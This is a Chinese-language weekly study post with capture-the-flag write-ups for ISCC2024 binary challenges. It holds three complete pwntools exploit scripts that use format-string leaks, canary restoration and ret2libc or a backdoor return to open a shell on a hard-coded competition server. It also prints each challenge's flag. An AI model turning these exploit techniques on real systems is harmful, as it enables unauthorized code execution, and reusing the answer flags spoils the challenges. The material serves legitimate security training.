24-05-06

本周学习总结

ISCC,我阐述你的梦。

全局常量声明:文章内容仅由教程观点和个人总结得出,仅供参考。

一、[ISCC2024]–chaos

看,别问。

flag:ISCC{M6u7oMuvYXbuBlFIjBcHwSmx8jmU2LBrJPCt}

二、[ISCC2024]–ISCC_easy

check:

32位程序,NX保护开启。

漏洞为格式化字符串漏洞(用于向指定地址写入以及泄漏 libc 地址)和栈溢出漏洞(用于覆盖返回地址劫持控制流)。

exp:

from pwn import *

def stre(a):
    """Return ``str(a)`` encoded as UTF-8 bytes (handy for sendline payloads)."""
    text = str(a)
    return text.encode()

def ph(a, b="addr"):
    """Print integer *a* in hex under label *b*, e.g. ``addr:0x1234``."""
    label = b
    print(":".join((label, hex(a))))

def re(a):
    """Receive up to *a* bytes from the module-level tube ``p``.

    NOTE: this helper shadows the stdlib ``re`` module for the whole script.
    """
    chunk = p.recv(a)
    return chunk

def pre(a):
    """Receive up to *a* bytes from ``p`` and echo the raw bytes to stdout."""
    data = p.recv(a)
    print(data)

def reu(a, b=False):
    """Receive from ``p`` until delimiter *a*; *b* is forwarded as ``drop=``."""
    drop_delim = b
    return p.recvuntil(a, drop=drop_delim)

def rel():
    """Receive a single line from ``p``."""
    line = p.recvline()
    return line

def se(a):
    """Send raw bytes *a* on ``p`` (no newline appended)."""
    tube = p
    tube.send(a)

def sea(a, b):
    """Wait for *a* on ``p``, then send *b* without a trailing newline."""
    tube = p
    tube.sendafter(a, b)

def sel(a):
    """Send *a* on ``p`` followed by a newline."""
    tube = p
    tube.sendline(a)

def sela(a, b):
    """Wait for *a* on ``p``, then send *b* followed by a newline."""
    tube = p
    tube.sendlineafter(a, b)

def op():
    """Hand the tube ``p`` to the user (interactive shell after exploitation)."""
    tube = p
    tube.interactive()

def cp():
    """Close the tube ``p``."""
    tube = p
    tube.close()

def raddr64():
    """Read 6 raw bytes from ``p``, zero-pad to 8 and unpack as a u64.

    Six bytes is the usual width of a raw 64-bit userland pointer written
    with ``write``/``puts``; the caller must make sure the pointer is the
    next thing on the wire.
    """
    raw = p.recv(6)
    padded = raw.ljust(8, b'\x00')
    return u64(padded)

def raddr32():
    """Read 4 raw bytes from ``p`` and unpack them as a u32."""
    raw = p.recv(4)
    return u32(raw)

def raddr_T():
    """Read 14 ASCII bytes from ``p`` (via ``re``) and parse them as hex.

    14 characters fit ``0x`` plus 12 hex digits, presumably a ``%p``-printed
    64-bit address; raises ValueError if the bytes are not hex (e.g. ``(nil)``).
    """
    text = re(14)
    return int(text, 16)

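def gdbp(p, a=''):
    """Attach gdb to tube *p* and pause the exploit so the debugger can settle.

    Args:
        p: the tube to attach to. The parameter deliberately shadows the
           module-level ``p`` so the helper can target any tube.
        a: optional gdbscript; an empty string means "attach with no script".
    """
    if a != '':
        gdb.attach(p, a)
    else:
        gdb.attach(p)
    # One pause for both branches (the original duplicated it per branch).
    pause()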

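def gdbm(name, b='', host="127.0.0.1", port=99999):
    """Attach gdb to a remote stub (e.g. ``qemu-mipsel -g PORT``) running *name*.

    Args:
        name: path to the executable being debugged (passed as ``exe=``).
        b: optional gdbscript; an empty string means "no script".
        host, port: address of the gdb stub. The historical default of 99999
            is kept for compatibility but is outside the valid TCP port range
            (0-65535), so callers must pass the real port given to ``-g`` for
            the attach to succeed.
    """
    target = (host, port)
    if b != '':
        gdb.attach(target=target, exe=name, gdbscript=b)
    else:
        gdb.attach(target=target, exe=name)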

def gret(elf):
    """Return the address of a bare ``ret`` gadget found in *elf*."""
    return ROP(elf).find_gadget(["ret"]).address

# Remote target: hard-coded competition instance; switch to one of the
# process() lines below for local runs.
p = remote("182.92.237.102", 10013)

# Local debugging options (commented out)
# p = process("./pw")
# p = process(["qemu-mipsel", "-g", "99999", "./pwn"])
# p = process(["qemu-mipsel", "./pwn"])
# elf = ELF("./pwn")
# Every libc offset below (system, /bin/sh, __libc_start_main) is taken from
# this file, so it must be the exact libc the remote service runs.
libc = ELF("./libc.so.6")

# context.log_level = 'debug'
# context.arch = 'amd64'
# context.os = 'linux'

# Exploit flow
# Stage 1: format-string write. %4$hn stores the number of bytes printed so
# far (4-byte address + "A" = 5) as a 16-bit value at 0x804C030. What lives at
# 0x804C030 is not visible here; presumably a check variable gating the
# overflow path -- confirm against the binary.
sea(b"fun!\n", p32(0x804C030) + b"A%4$hn")

# Stage 2: stack overflow back to main (0x94 bytes of padding before the
# return address) so the format-string prompt can be reached a second time.
main_addr = 0x80492E8
payload = b"A" * 0x94 + p32(main_addr)
sea(b"Input:\n", payload)
# Stage 3: leak a libc pointer. Slot %27$p is assumed to hold the return
# address into __libc_start_main, 245 bytes past the symbol; both the slot
# index and the 245 offset are binary/libc specific. int() raises ValueError
# if the slot prints as "(nil)" rather than hex.
sea(b"fun!\n", b"%27$p-")

libc_base = int(reu(b"-", True), 16) - 245 - libc.sym["__libc_start_main"]
ph(libc_base, "libc_base")

sys_addr = libc_base + libc.sym["system"]
bin_addr = libc_base + next(libc.search(b"/bin/sh\x00"))

# Stage 4: i386 ret2libc -- return into system() with a dummy return address
# (0) followed by the "/bin/sh" pointer as its first argument.
payload = b"A" * 0x94 + p32(sys_addr) + p32(0) + p32(bin_addr)
sea(b"Input:\n", payload)
op()

flag:ISCC{IsCu4w4AdYDWZnVyGGRPAdz8wDfxC5PUhYos}

三、[ISCC2024]–Flag

Check:

32位程序,canary和NX开启。

漏洞为格式化字符串漏洞和栈溢出漏洞。

难点在于确定远程 libc 版本:exp 中 `__libc_start_main` 返回地址的偏移 245 以及 system、/bin/sh 的偏移都取决于所用的 libc.so.6,版本不对则算出的 libc_base 是错的。

通过字符串格式化泄漏获得help.txt的部分内容、libc_base和canary。

通过栈溢出getshell。

exp:

from pwn import *

def stre(a):
    """Return ``str(a)`` encoded as UTF-8 bytes (handy for sendline payloads)."""
    text = str(a)
    return text.encode()

def ph(a, b="addr"):
    """Print integer *a* in hex under label *b*, e.g. ``addr:0x1234``."""
    label = b
    print(":".join((label, hex(a))))

def re(a):
    """Receive up to *a* bytes from the module-level tube ``p``.

    NOTE: this helper shadows the stdlib ``re`` module for the whole script.
    """
    chunk = p.recv(a)
    return chunk

def pre(a):
    """Receive up to *a* bytes from ``p`` and echo the raw bytes to stdout."""
    data = p.recv(a)
    print(data)

def reu(a, b=False):
    """Receive from ``p`` until delimiter *a*; *b* is forwarded as ``drop=``."""
    drop_delim = b
    return p.recvuntil(a, drop=drop_delim)

def rel():
    """Receive a single line from ``p``."""
    line = p.recvline()
    return line

def se(a):
    """Send raw bytes *a* on ``p`` (no newline appended)."""
    tube = p
    tube.send(a)

def sea(a, b):
    """Wait for *a* on ``p``, then send *b* without a trailing newline."""
    tube = p
    tube.sendafter(a, b)

def sel(a):
    """Send *a* on ``p`` followed by a newline."""
    tube = p
    tube.sendline(a)

def sela(a, b):
    """Wait for *a* on ``p``, then send *b* followed by a newline."""
    tube = p
    tube.sendlineafter(a, b)

def op():
    """Hand the tube ``p`` to the user (interactive shell after exploitation)."""
    tube = p
    tube.interactive()

def cp():
    """Close the tube ``p``."""
    tube = p
    tube.close()

def raddr64():
    """Read 6 raw bytes from ``p``, zero-pad to 8 and unpack as a u64.

    Six bytes is the usual width of a raw 64-bit userland pointer written
    with ``write``/``puts``; the caller must make sure the pointer is the
    next thing on the wire.
    """
    raw = p.recv(6)
    padded = raw.ljust(8, b'\x00')
    return u64(padded)

def raddr32():
    """Read 4 raw bytes from ``p`` and unpack them as a u32."""
    raw = p.recv(4)
    return u32(raw)

def raddr_T():
    """Read 14 ASCII bytes from ``p`` (via ``re``) and parse them as hex.

    14 characters fit ``0x`` plus 12 hex digits, presumably a ``%p``-printed
    64-bit address; raises ValueError if the bytes are not hex (e.g. ``(nil)``).
    """
    text = re(14)
    return int(text, 16)

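def gdbp(p, a=''):
    """Attach gdb to tube *p* and pause the exploit so the debugger can settle.

    Args:
        p: the tube to attach to. The parameter deliberately shadows the
           module-level ``p`` so the helper can target any tube.
        a: optional gdbscript; an empty string means "attach with no script".
    """
    if a != '':
        gdb.attach(p, a)
    else:
        gdb.attach(p)
    # One pause for both branches (the original duplicated it per branch).
    pause()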

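def gdbm(name, b='', host="127.0.0.1", port=99999):
    """Attach gdb to a remote stub (e.g. ``qemu-mipsel -g PORT``) running *name*.

    Args:
        name: path to the executable being debugged (passed as ``exe=``).
        b: optional gdbscript; an empty string means "no script".
        host, port: address of the gdb stub. The historical default of 99999
            is kept for compatibility but is outside the valid TCP port range
            (0-65535), so callers must pass the real port given to ``-g`` for
            the attach to succeed.
    """
    target = (host, port)
    if b != '':
        gdb.attach(target=target, exe=name, gdbscript=b)
    else:
        gdb.attach(target=target, exe=name)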

def gret(elf):
    """Return the address of a bare ``ret`` gadget found in *elf*."""
    return ROP(elf).find_gadget(["ret"]).address

# Remote target: hard-coded competition instance; switch to one of the
# process() lines below for local runs.
p = remote("182.92.237.102", 10012)

# Local debugging options (commented out)
# p = process("./pwn")
# p = process(["qemu-mipsel", "-g", "99999", "./pwn"])
# p = process(["qemu-mipsel", "./pwn"])
# elf = ELF("./pwn")
# Every libc offset below (system, /bin/sh, __libc_start_main) is taken from
# this file, so it must be the exact libc the remote service runs.
libc = ELF("./libc.so.6")

# Debug and architecture settings
# context.log_level = 'debug'
context.arch = 'i386'
context.os = 'linux'

# Exploit flow
# Stage 1: a single format-string read leaks two stack slots in one go:
# %19$p (assumed to be the canary) and %27$p (assumed to be the return
# address into __libc_start_main, 245 bytes past the symbol). The slot
# indices and the 245 offset are specific to this binary/libc; int() raises
# ValueError if a slot prints as "(nil)" instead of hex.
sela(b"content?\n", b"%19$p-%27$p-")
reu(b"Your answered:\n")

canary = int(reu(b"-", True), 16)
ph(canary, "canary")

libc_base = int(reu(b"-", True), 16) - 245 - libc.sym["__libc_start_main"]
ph(libc_base, "libc_base")

bin_addr = libc_base + next(libc.search(b"/bin/sh\x00"))
sys_addr = libc_base + libc.sym["system"]

# Stage 2: stack overflow with the canary restored so the stack-protector
# check passes. Layout: 0x88 bytes of buffer, canary, 12 bytes (presumably
# saved registers/ebp -- verify in gdb), then i386 ret2libc: system(),
# a dummy return address (0), and the "/bin/sh" pointer as its argument.
payload = b"A" * 0x88 + p32(canary) + p32(0) * 3 + p32(sys_addr) + p32(0) + p32(bin_addr)
sea(b"Input:\n", payload)
op()

flag:ISCC{2zUu5zjYop23TI6koriaAzvlnGfzcI70Zrbf}

四、[ISCC2024]–easyshell

Check:

64位程序,保护全开。

漏洞为格式化字符串漏洞和栈溢出漏洞,且程序自带后门函数。先通过格式化字符串泄漏 PIE 基址和 canary,再利用栈溢出(写回正确的 canary)把返回地址劫持到后门函数。

exp:

from pwn import *

def stre(a):
    """Return ``str(a)`` encoded as UTF-8 bytes (handy for sendline payloads)."""
    text = str(a)
    return text.encode()

def ph(a, b="addr"):
    """Print integer *a* in hex under label *b*, e.g. ``addr:0x1234``."""
    label = b
    print(":".join((label, hex(a))))

def re(a):
    """Receive up to *a* bytes from the module-level tube ``p``.

    NOTE: this helper shadows the stdlib ``re`` module for the whole script.
    """
    chunk = p.recv(a)
    return chunk

def pre(a):
    """Receive up to *a* bytes from ``p`` and echo the raw bytes to stdout."""
    data = p.recv(a)
    print(data)

def reu(a, b=False):
    """Receive from ``p`` until delimiter *a*; *b* is forwarded as ``drop=``."""
    drop_delim = b
    return p.recvuntil(a, drop=drop_delim)

def rel():
    """Receive a single line from ``p``."""
    line = p.recvline()
    return line

def se(a):
    """Send raw bytes *a* on ``p`` (no newline appended)."""
    tube = p
    tube.send(a)

def sea(a, b):
    """Wait for *a* on ``p``, then send *b* without a trailing newline."""
    tube = p
    tube.sendafter(a, b)

def sel(a):
    """Send *a* on ``p`` followed by a newline."""
    tube = p
    tube.sendline(a)

def sela(a, b):
    """Wait for *a* on ``p``, then send *b* followed by a newline."""
    tube = p
    tube.sendlineafter(a, b)

def op():
    """Hand the tube ``p`` to the user (interactive shell after exploitation)."""
    tube = p
    tube.interactive()

def cp():
    """Close the tube ``p``."""
    tube = p
    tube.close()

def raddr64():
    """Read 6 raw bytes from ``p``, zero-pad to 8 and unpack as a u64.

    Six bytes is the usual width of a raw 64-bit userland pointer written
    with ``write``/``puts``; the caller must make sure the pointer is the
    next thing on the wire.
    """
    raw = p.recv(6)
    padded = raw.ljust(8, b'\x00')
    return u64(padded)

def raddr32():
    """Read 4 raw bytes from ``p`` and unpack them as a u32."""
    raw = p.recv(4)
    return u32(raw)

def raddr_T():
    """Read 14 ASCII bytes from ``p`` (via ``re``) and parse them as hex.

    14 characters fit ``0x`` plus 12 hex digits, presumably a ``%p``-printed
    64-bit address; raises ValueError if the bytes are not hex (e.g. ``(nil)``).
    """
    text = re(14)
    return int(text, 16)

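def gdbp(p, a=''):
    """Attach gdb to tube *p* and pause the exploit so the debugger can settle.

    Args:
        p: the tube to attach to. The parameter deliberately shadows the
           module-level ``p`` so the helper can target any tube.
        a: optional gdbscript; an empty string means "attach with no script".
    """
    if a != '':
        gdb.attach(p, a)
    else:
        gdb.attach(p)
    # One pause for both branches (the original duplicated it per branch).
    pause()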

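def gdbm(name, b='', host="127.0.0.1", port=99999):
    """Attach gdb to a remote stub (e.g. ``qemu-mipsel -g PORT``) running *name*.

    Args:
        name: path to the executable being debugged (passed as ``exe=``).
        b: optional gdbscript; an empty string means "no script".
        host, port: address of the gdb stub. The historical default of 99999
            is kept for compatibility but is outside the valid TCP port range
            (0-65535), so callers must pass the real port given to ``-g`` for
            the attach to succeed.
    """
    target = (host, port)
    if b != '':
        gdb.attach(target=target, exe=name, gdbscript=b)
    else:
        gdb.attach(target=target, exe=name)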

def gret(elf):
    """Return the address of a bare ``ret`` gadget found in *elf*."""
    return ROP(elf).find_gadget(["ret"]).address

# ==================== Connection ====================

# Remote target: hard-coded competition instance; switch to one of the
# process() lines below for local runs.
p = remote("182.92.237.102", 10011)
# p = process("./002")
# p = process(["qemu-mipsel", "-g", "99999", "./pwn"])
# p = process(["qemu-mipsel", "./pwn"])

# ==================== ELF and context ====================

# elf = ELF("./pwn")
# Loaded but never referenced below: this exploit returns into a backdoor
# inside the binary, so no libc offsets are needed.
libc = ELF("./libc.so.6")

# context.log_level = 'debug'
# context.arch = 'amd64'
# context.os = 'linux'
# elf.arch, elf.so

# ==================== Exploit ====================

# Leak canary and PIE base through the format string: %15$p is assumed to be
# the canary and %17$p a code pointer 0x1520 past the PIE base. The slot
# indices and the 0x1520 / 0x1291 offsets are specific to this build; int()
# raises ValueError if a slot prints as "(nil)" instead of hex.
sela(b">>", b"flagis %15$p-%17$p-")
canary = int(reu(b"-", True), 16)
pie = int(reu(b"-", True), 16) - 0x1520

ph(canary, "canary")
ph(pie, "pie")

# Stack overflow: 0x38 bytes of buffer, the leaked canary written back so the
# stack-protector check passes, 8 more bytes (presumably saved rbp), then the
# return address redirected to the backdoor at pie + 0x1291.
sela(b">>", b"A" * 0x38 + p64(canary) + b"A" * 0x8 + p64(pie + 0x1291))

# "exit" makes the vulnerable function return, which fires the overwritten
# return address.
sela(b">>", b"exit")

# Interactive shell
op()

flag:ISCC{Ugoa6UepMLs94APuoGLvra5iWymJhMlLFoHN}

下周学习计划

| 应该要做的事情 |

学习感受

pycc

